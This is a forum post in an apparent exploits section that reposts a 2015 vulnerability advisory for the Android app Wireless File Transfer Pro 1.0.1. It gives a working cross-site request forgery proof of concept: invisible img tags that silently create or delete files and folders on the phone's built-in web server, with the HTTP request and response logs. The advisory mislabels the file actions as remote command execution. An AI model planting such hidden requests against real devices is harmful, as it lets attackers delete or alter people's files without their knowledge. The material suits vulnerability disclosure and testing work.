Jump to content
Aerosol

Wireless File Transfer Pro 1.0.1 CSRF

By Aerosol, in Exploituri

Recommended Posts

Aerosol Newbie

Aerosol

Posted
Posted 

Document Title:
===============
Wireless File Transfer Pro 1.0.1  - (Android)   CSRF Remote Command Execution (Creat, Delete)


Release Date:
=============
2015-02-10


Product & Service Introduction:
===============================
Wireless File Transfer Pro is the advanced version of Wireless File Transfer. 


(Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=com.lextel.WirelessFileTransferPro )

Affected Product(s):
====================
Wireless File Transfer Pro 5.9.5 - (Android) Web Application 1.0.1
Lextel Technology  


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium

Request Method(s):
                [+] [GET]

Vulnerable Module(s):
                [+] browse

Vulnerable Parameter(s):
                [+] fileExplorer.html?

Affected Module(s):
                [+] Index of Documents (http://localhost:8888)


Technical Details & Description:
================================
cross site request forgery has been discovered in the Wireless File Transfer Pro 1.0.1  Android mobile web-application.
The mobile web-application is vulnerable to a combination of cross site request forgery and local command injection attacks.



Proof of Concept (PoC):
=======================
Creat New Folder 

<img src="http://192.168.1.2:8888/fileExplorer.html?action=create&type=folder&folderName=test1" width="0" height="0" border="0">

--- PoC Session Logs [GET] (Execution) ---
GET /fileExplorer.html?action=create&type=folder&folderName=test1 HTTP/1.1
Host: 192.168.1.2:8888
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard
Connection: keep-alive





HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 4

<a href="#" onclick="actionBrower('/sdcard/test1')">test1</a></td></td><td width="24%"></td><td width="24%">2015-02-09 18:12:19</td><td width="15%">


Delete File, Folder

<img src="http://192.168.1.2:8888/fileExplorer.html?action=deleteFile&fileName=test""width="0" height="0" border="0">

--- PoC Session Logs [GET] (Execution) ---


GET /fileExplorer.html?action=deleteFile&fileName=test HTTP/1.1
Host: 192.168.1.2:8888
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard
Connection: keep-alive


HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 30





Reference:
http://localhost:8888/

Security Risk:
==============
The security risk of the cross site request forgery issue and command injection vulnerability is estimated as medium. (CVSS 4.4)


Credits & Authors:
==================
Hadji Samir s-dz@hotmail.fr

Source

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...